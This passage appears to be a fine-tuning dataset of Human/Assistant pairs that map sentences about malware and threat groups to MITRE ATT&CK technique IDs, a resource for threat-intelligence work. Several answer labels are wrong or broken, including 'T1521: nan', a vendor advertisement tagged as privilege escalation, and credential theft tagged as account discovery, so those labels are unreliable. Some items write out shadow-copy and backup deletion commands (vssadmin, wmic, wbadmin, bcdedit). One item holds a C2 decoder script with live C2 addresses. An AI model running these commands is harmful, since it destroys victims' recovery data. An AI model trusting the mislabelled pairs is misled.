but stateful protocols such as TCP can be used as well.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has run a plug-in on a victim to spread through the local network by using PsExec and accessing admin shares.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control .### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy captures window titles.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has used tasklist.exe to get a snapshot of the current processes’ state of the target machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy performs persistence with a logon script via adding to the Registry key HKCU\Environment\UserInitMprLogonScript.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon schedules tasks to invoke its components in order to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon established persistence by setting the HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load registry key to point to its executable.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After checking for the existence of two files, keyword_parm.txt and parm.txt, MESSAGETAP XOR decodes and read the contents of the files.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When it first starts, BADNEWS spawns a new thread to log keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The generation of web credentials often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target the different network services provided by systems to conduct a DoS.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After connecting to the IRC server, the MPK bot sends custom ping messages and provides an introduction via a “!Hello” message that contains the current logged in user of the infected host, if the user has administrator privileges, the hostname, the UUID of the system, and operating system version### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use cmd.exe to launch itself and to execute multiple C2 commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet enumerates user accounts of the local host.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Windows Registry modifications.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has compressed data into password-protected RAR archives prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use process hollowing for execution.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D has variants that check a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as sysctl hw.model.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It first grabs an encrypted blob stored away in a global variable and pulls out 381 bytes of this encrypted data: The standard win32 api CryptDecrypt uses rc4 to decrypt this blob into a hardcoded c2, url path, and url parameters listed below with a simple 140-bit key “\x8B\xFF\x55\x8B\xEC\x83\xEC\x50\xA1\x84\x18\x03\x68\x33\xC9\x66\xF7\x45\x10\xE8\x1F\x89\x45\xFC\x8B\x45\x14\x56″### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook can support commands to execute Python-based payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We analyzed the command handler and found that it provided the necessary commands for a fully functional backdoor, as seen in Table 1### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has attempted to map to C$ on enumerated hosts to test the scope of their current credentials/context.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has utilized Zlib compression to obfuscate the communications payload.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK is capable of performing keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Old Comnie Variant C2 Decoder 12345678910111213141516171819 import requestsimport sysimport redef decode(data):  o = """"  for c in data:    if c == ""*"":      o += "".""    elif c == ""|"":      o += "":""    elif c == ""+"":      o += "";""    else:      o += chr(ord(c)-49)  return or = requests.get(sys.argv[1])fd = r.textdata = fd.split(""++a++"")[1].split(""++a++"")[0]print(decode(data))   Samples Analyzed eed5945c36ba22a2531dd2d9dd7bc4e17e68544d512be75670919caf287c1b4a 8026442b812469e48ccd11611ab6eacdcb312a8f1aabd563b7f4cb4868315e16 c8951038fd53321661274e5a12532c3fb6f73c75fd75503a1089c56990658fef 48a1ce103e5bf47c47cc5ed40b2dc687ebaf3674d667419287bcb1d0b8d8dda6 e06b797a24fa03a77e0d5f11b0cf0f4f038e0a9ea04d4981d39148969349c79c 7282d0709449abe16457864f58157cac8d007571dc5d463d393d1ae2605d17e0 bf6ee8426245b167a69292e513c0841d818b310dda87daea649221f4e0afd1b3 62b98dde60cb4dd0d0088bde222c5c2c4c92560cccf4753f1ce94e044093ab85 756952652290ad09fe03c8674d44eab2077b091398187c3abcb6f1ddc462c32d 639a49390c6f8597d36ec0bd245efa1b4a078c0506fb515e577a40389b39a614 29ed6eb3c882b018c2bb6bf2f8eb15069dc5510ca119abebf24f09e3c91f10aa 0e8a4e4d5ca501bad25a730fb5de534fa324c6ac23e0a573524693f2d996d105 316a0c6849f183a1a52d0c7648e722c4ca85bd57b0804a147c0c8656b84bbdb9   Identified C2s 121.126.211[.]94:8080 113.196.70[.]11:80,8080 133.130.101[.]47:443 123.51.208[.]157:443;8000;8080   C2 Hosting URLs (DDR URLs) github[.]com/korlee5643 itsmonsee.tumblr[.]com allworldnewsway.blogspot[.]com### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can delete the shadow volumes with vssadmin Delete Shadows /all /quiet and can use bcdedit to disable recovery options.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell can upload files over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORALDECK has exfiltrated data in HTTP POST headers.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackMould has the ability to download files to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OLDBAIT obfuscates internal strings and unpacks them at startup.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis has the ability to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used tools to enumerate software installed on an infected host.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trend Micro Solutions Trend Micro™ Deep Security™ and Vulnerability Protection provide virtual patching that protects endpoints from threats such as malicious redirections to malware-hosting URLs, as well as those that exploit unpatched vulnerabilities### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE encodes data in hexadecimal format over the C2 channel.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This greatly reduces the resources available for providing the targeted service.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has used HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak has named malware ""svchost.exe,"" which is the name of the Windows shared service host program.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has utilized various scans and queries to find domain controllers and remote services in the target environment.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Poison Frog server handles both the HTTP and DNS tunneling channels used by the hUpdater.ps1 and dUpdater.ps1 scripts### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk has called GetCurrentProcess.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ajax Security Team has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX has a module for capturing keystrokes per process including window titles.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The main CozyCar dropper checks whether the victim has an anti-virus product installed.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has created a run key named Dropbox Update Setup to mask a persistence mechanism for a malicious binary.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, the system may require an administrative account to log in or to perform it's intended purpose.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea collects information about running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST remained dormant after initial access for a period of up to two weeks.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hi-Zor has the ability to create a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Poseidon Group conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As a result of all these steps, the last-stage Trojan is injected into svchost.exe’s process memory### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SYSCON has the ability to use Systeminfo to identify system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use advanced web injects to steal web banking credentials.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq uses basic obfuscation in the form of spaghetti code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DDE execution can be invoked remotely via Remote Services such as Distributed Component Object Model .### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework., poison name services### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can use zlib to compress and decompress data.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RemoteCMD can execute commands remotely by creating a new schedule task on the remote system RTM tries to add a scheduled task to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Brave Prince gathers file and directory information from the victim’s machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, some variants of FakeM use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can issue SOAP requests to delete already processed C2 emails.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through Credential Access techniques.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several BRONZE BUTLER tools encode data with base64 when posting it to a C2 server.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy uses Python scripts for installing files and performing execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can spawn a job to inject into LSASS memory and dump password hashes.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 actors used the following command to rename one of their tools to a benign file name: ren ""%temp%\upload"" audiodg.exe The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by APT1 as a name for malware.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can execute various Windows commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBShower has attempted to obtain a VBS script from command and control nodes over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia uses HTTP and HTTPS for C2 network communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi collects current and parent process IDs.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt has a command to perform a process listing.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This links the previous samples with this unique username### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used a Perl reverse shell to communicate with C2.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has the ability to compress archived screenshots.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao's backdoors have been written in Python and compiled with py2exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 encrypted a .dll payload using RTL and a custom encryption algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries , on Windows systems.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has been delivered via malicious links in phishing e-mails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon can obtain victim drive information as well as a list of folders in C:\Program Files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * Windows Management Instrumentation can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no H1N1 disable recovery options and deletes shadow copies from the victim.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BACKSPACE is capable of enumerating and making modifications to an infected system's Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang used a .NET tool to dump data from Microsoft Exchange mailboxes.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to execute a process using runas.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these sources may reveal opportunities for other forms of reconnaissance or Search Open Technical Databases, establishing operational resources or Compromise Accounts, and/or initial access or Phishing.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A tool has been developed to facilitate planting backdoors in cloud container images.### Assistant: T1525: Implant Internal Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth creates a startup item for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules , so the messages evade spam/phishing detection mechanisms.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The downloaded document template contains the malicious macro codes, which executes a VBScript (VBS).### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used the win32_service WMI class to retrieve a list of services from the system.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities .### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can extract its agent from the body of a malicious document.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to find cloud groups and permission settings.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 regularly used stealthy techniques to blend in with legitimate user activity: During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the /Library/LaunchDaemons/ folder with the RunAtLoad key set to true establishing persistence as a Launch Daemon.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang has the ability to encode and RC6 encrypt data sent to C2.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon can gather system information from the victim’s machine such as the OS version, machine name, and drive information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has gained execution through users opening malicious attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Otherwise, access is denied.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may rely upon a user clicking a malicious link in order to gain execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can delete scripts from a subdirectory of /tmp after they are run.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another variant is encoded with XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used valid accounts to access SMB shares.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE gathers the MAC address of the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT has a plugin for credential harvesting.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has looked in the registry to find the default browser path.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, through behaviors such as Modify System Image, Reduce Key Space, and Disable Crypto Hardware, an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note: DLL side loading is a prevalent persistence technique that is used to launch a multitude of backdoors### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can upload and download files to and from compromised hosts.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can collect and send OS version and computer name as a part of its C2 beacon.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ltd.. Wizard Spider has used Digicert code-signing certificates for some of its malware.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp uses a rootkit to hook and implement functions on the system.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can use netstat to enumerate network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has obfuscated .NET executables by inserting junk code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note: CTU researchers frequently observe threat actors renaming archiving tools and storing data for exfiltration in uncommon directories### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage Patch System Image due to the monolithic nature of the architecture.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2: WindowsParentalControlsMigration CommandLineTemplate Figure 3 contains the decoded PowerShell command from the “CommandLineTemplate.” Figure 3: Decoded CommandLineTemplate PowerShell code POSHSPY PowerShell Component The full code for a POSHSPY sample is available here### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework., MISC::AddSid### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Motherboard Check The Trojan will perform the following WMI query:   Select * from Win32_BaseBoard   The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used Installutill to download content.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has created self-signed digital certificates for use in HTTPS C2 traffic.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common public key encryption algorithms include RSA and ElGamal.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used AES encrypted communications in C2.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to use multiple dynamically resolved API calls.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak obtains Windows logon password details.### Assistant: T1003: OS 